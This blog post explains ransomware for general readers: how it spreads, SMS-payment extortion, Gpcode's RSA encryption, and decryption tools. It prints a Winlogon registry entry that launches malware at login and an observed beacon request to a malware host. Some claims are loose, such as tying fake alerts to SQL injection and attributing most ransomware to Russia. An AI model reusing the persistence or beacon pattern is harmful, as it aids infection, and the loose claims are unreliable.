GBCONCEPTS ONLINE

What is ransomware?
Ransomware is simply a malicious code or program authored by individuals (hackers, crackers or other evil minded persons) aimed specifically to hold a person or infected system to ransom.

How does it work?

Ransomware can be authored and cloaked to look like a genuine piece of software or application, in fact most often come in with the user actually clicking on the links deliberately with the belief that the link is for a safe program or code. Most are in the form of fake alerts (see Sql injection on this blog).
Now once the  link is clicked the code is executed on the target machine, the machine then either shuts down or does the bidding of the malicious code. It completely refuses any commands by you and any attempt on the contrary pops up a message asking you to call a certain phone number or send sms to a pre-defined (pseudo-unique) phone number to be given a link on how to stop the code running or to uninstall it.
This is of course after paying a certain amount of money to the malicious code developer. Most of these come from Russia.

It comes in form of a trojan. Such as Trj/SMSlock.A, t Trojan-SMS.Python.Flocker mobile malware,  RedBrowser mobile malware. etc

Networkworld put it this way: Once on the victim’s PC, the Trojan swings into action, encrypting a wide variety of document types such as Microsoft Word .doc files, Adobe Reader .pdf documents etc anytime one of these documents is opened. It also scrambles the files in Windows’ “My Documents” folder. When a user tries to open one of the encrypted files, an alert pops up saying that a utility called FileFix Pro 2009 will unscramble the data.
“Windows detected that some of your MS Office and media files are corrupted.
Click here to download and install recommended file repair application,” the message reads.

Clicking on the alert downloads and installs FileFix Pro, then demands the user purchase the software.
Price? $50.

It often creates a startup registry entry like this:

HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\ Userinit  =C:\WINDOWS\System32\userinit.exe,c:\malware.exe

This means that everytime the user tries to login to the system, along with userinit.exe (A legitimate windows process responsible for loading user profiles which contain desktop themes, fonts, wallpapers, etc) a malware instance will be launched at the same time.

The following is the observed outbound communication:

GET /registerguid.php?guid={98607c80-9a71-494f-a81e-32b7bb536a0c}&wid=59&u=6&number=35743798&install=1 HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.0; .NET CLR 1.0.2914)
Host: ogggooogoggoog.com
Connection: Keep-Alive

Can you beat that?

How do they collect? Watch this; according to a post on Fireeye blog
These SMS codes use paid “rooms”.  These “rooms” have a concept like 1900 numbers where it costs money to phone in.  Every time someone sends an SMS to one of these rooms, a fixed amount of money is deducted from the sender’s balance and it gets transferred to the owner of the room.

According to Wikipedia,

Ransomware typically propagates as a conventional computer worm, entering a system through, for example, a vulnerability in a network service or an e-mail attachment. It may then:

• Disable an essential system service or lock the display at system startup.
• Encrypt some of the user’s personal files. Encrypting ransomware were originally referred to as cryptoviruses, cryptotrojans or cryptoworms.

In both cases, the malware may extort by:

• Prompt the user to enter a code obtainable only after wiring payment to the attacker or sending an SMS message and accruing a charge.
• Urging the user to buy a decryption or removal tool.

More sophisticated ransomware may hybrid-encrypt the victim’s plaintext with a random symmetric key and a fixed public key. The malware author is the only party that knows the needed private decryption key. The author who carries out this cryptoviral extortion attack offers to recover the symmetric key for a fee.

How dangerous are they?

Very dangerous.

The first known ransomware in 1989 PC Cyborg Trojan, only encrypted filenames with a weak symmetric cipher.
Whereas the current variants do not have self-propagation functions, their primarily propagation vector remains the hundreds of currently active blackhat search engine optimization campaigns serving ubiquitous fake codecs.

Examples of extortive ransomware reappeared in 2005. By mid-2006, worms such Gpcode, TROJ.RANSOM.A, Archiveus, Krotten, Cryzip, and MayArchive began utilizing more sophisticated RSA encryption schemes, with ever-increasing key-sizes.

Gpcode.AG, which was detected in June 2006, encrypted with a 660-bit RSA public key. Gpcode.AK, detected in June 2008, uses a 1024-bit RSA key, which is believed to be large enough to be computationally infeasible to break without a concerted distributed effort.

This new encryption method according to Aleks Gostev, senior virus analyst at Kaspersky “We estimate it would take around 15 million modern computers, running for about a year, to crack such a key,” He wrote on the company’s blog.

David Perry, the global director of education for antivirus vendor Trend Micro Inc. said of this form of attack, “This does look like a new tactic,.. but all online fraud is just minor variations of classic con games. This is just the ‘Bank Examiner’ played out on the Internet.”
He continued, This isn’t the first time the tactic’s been used, but it is remarkably polished, we’ve not seen ‘ransomware’ with this level of sophistication.”

How to avoid or fix it?

For SMSlock.A it is considered the work of less technically sophisticated people, making it fairly easy to bypass.
Dr.Web has even released a generator for deactivation codes so that affected users don’t have to pay.

Victims of the FileFix Pro 2009 scam can now heave a sigh of relief as they do not need to shell out cash to restore their files, according to researchers, who have figured out how to decrypt the data. The Bleeping Computer site, for instance, has a free program called “Anti FileFix” available for download that unscrambles files corrupted by the Trojan. The security company FireEye Inc. has also created a free online decrypter which restores files to their original condition.

These malware are so recalcitrant that it prompted Symantec recently to write a technical report about this malware threat and also provided a tool to generate the unlock key.

Unfortunately, this tool doesn’t work for the variant 6211D3AF9D2EE3DCD44C948A4ECF6633. Instead of having a 10 or 11 digit code starting with 411, this new variant has 9 digit code and it starts with 412. Another interesting fact as shown in the VirusTotal report, of the 19 listed AVs which detected this malware as a threat, Nortron Anti-Virus is not one of them.

Kaspersky and other anti-virus companies have previously unraveled the secret encryption key for all previous versions of Gpcode, but this time, the malware author is wiser. Now, the Gpcode author is encrypting victim files with an extremely strong 1,024-bit RSA encryption key. This code is presently considered by experts as uncrackable. Your anti-virus will not bail you out here. However, for assistance you can go here.

Bottom line: Never click on those links if you suspect them. Period.

Tweet This Post